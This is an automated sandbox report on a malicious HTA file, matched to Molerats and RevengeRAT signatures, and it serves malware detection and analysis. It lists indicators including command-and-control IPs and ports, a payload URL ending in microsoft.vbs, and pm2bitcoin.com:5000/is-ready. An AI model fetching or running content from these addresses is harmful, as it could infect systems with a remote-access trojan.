Analysis Report microsoft.hta

Overview

General Information

Joe Sandbox Version:	24.0.0 Fire Opal
Analysis ID:	84810
Start date:	17.10.2018
Start time:	21:12:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	microsoft.hta
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winHTA@49/18@2/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Found application associated with file extension: .hta
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	100	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://pm2bitcoin.com:5000/is-ready

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: http://pm2bitcoin.com:5000/is-ready

virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: microsoft.hta

virustotal: Detection: 10%

Perma Link

Yara signature match

Show sources

Source: 00000005.00000003.1648661343.02828000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000018.00000003.1783978911.00808000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.2097194001.043E0000.00000004.sdmp, type: MEMORY	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000003.1660564655.0282B000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000003.1869485454.026C8000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000003.1774350891.00C9D000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000003.1777449971.00CC8000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000003.1871686478.021B5000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000003.1650450229.00CB8000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000018.00000003.1777322636.024E9000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000003.1814699090.028BB000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.1684455083.0071D000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000003.1772877643.028B8000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000018.00000003.1804762410.00809000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000003.1870458103.021B5000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.1719040637.02669000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.1687366851.00748000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000003.1668480739.00CB9000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000003.1771537764.03221000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000021.00000002.1929031849.01BFC000.00000004.sdmp, type: MEMORY	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.1728354835.0074A000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.1682024502.03351000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000003.1926941048.021BA000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000003.1893158995.026CB000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000018.00000003.1782023823.00808000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.1725530094.0074A000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000021.00000002.1936492458.043A0000.00000004.sdmp, type: MEMORY	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000012.00000002.2094413117.01AA0000.00000004.sdmp, type: MEMORY	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000018.00000003.1802081353.024EC000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000003.1648294841.034E1000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000003.1649176861.00C8D000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.1683144936.02666000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000018.00000003.1775852566.03211000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000003.1868087137.03221000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000018.00000003.1803354178.00809000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000017.00000003.1817762215.00CCA000.00000004.sdmp, type: MEMORY	Matched rule: Molerats_Jul17_Sample_4 date = 2017-07-07, hash1 = 512a14130a7a8b5c2548aa488055051ab7e725106ddf2c705f6eb4cfa5dc795c, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000021.00000002.1915472775.01A00000.00000004.sdmp, type: MEMORY	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 33.2.powershell.exe.43a0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.powershell.exe.43e0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 33.2.powershell.exe.43a0000.5.unpack, type: UNPACKEDPE	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.powershell.exe.43e0000.5.unpack, type: UNPACKEDPE	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/

Spreading:

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior

Networking:

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic	TCP traffic: 192.168.2.3:49169 -> 194.5.98.10:5000
Source: global traffic	TCP traffic: 192.168.2.3:49174 -> 23.105.131.191:5478

Connects to IPs without corresponding DNS lookups

Show sources

Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191
Source: unknown	TCP traffic detected without corresponding DNS query: 23.105.131.191

Internet Provider seen in connection with other malware

Show sources

Source: Joe Sandbox View	ASN Name: NOBIS-TECH-NobisTechnologyGroupLLCUS NOBIS-TECH-NobisTechnologyGroupLLCUS
Source: Joe Sandbox View	ASN Name: AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUS AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUS

Found strings which match to known social media urls

Show sources

Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: briargrove.org

Urls found in memory or binary data

Show sources

Source: powershell.exe, 00000004.00000002.1681803025.04CF0000.00000004.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000004.00000002.1681803025.04CF0000.00000004.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: powershell.exe, 00000004.00000002.1681803025.04CF0000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: wscript.exe, 00000006.00000002.2058881653.0033F000.00000004.sdmp	String found in binary or memory: http://pm2bitcoin.com:5000/is-ready
Source: wscript.exe, 00000006.00000002.2058881653.0033F000.00000004.sdmp	String found in binary or memory: http://pm2bitcoin.com:5000/is-readyS
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000004.00000002.1654831029.01DD8000.00000004.sdmp	String found in binary or memory: https://briargrove.org
Source: powershell.exe, 00000004.00000002.1654831029.01DD8000.00000004.sdmp	String found in binary or memory: https://briargrove.org/microsoft
Source: powershell.exe, 00000004.00000002.1644143606.003E4000.00000004.sdmp, powershell.exe, 00000004.00000002.1654831029.01DD8000.00000004.sdmp, powershell.exe, 00000004.00000002.1652412654.01BB0000.00000004.sdmp, microsoft.hta	String found in binary or memory: https://briargrove.org/microsoft.vbs
Source: powershell.exe, 00000004.00000002.1654831029.01DD8000.00000004.sdmp	String found in binary or memory: https://briargrove.org/microsoft.vbst
Source: powershell.exe, 00000004.00000002.1669040705.02123000.00000004.sdmp	String found in binary or memory: https://briargrove.orgx&
Source: powershell.exe, 00000004.00000002.1681803025.04CF0000.00000004.sdmp, powershell.exe, 00000004.00000002.1683706016.04F90000.00000004.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443

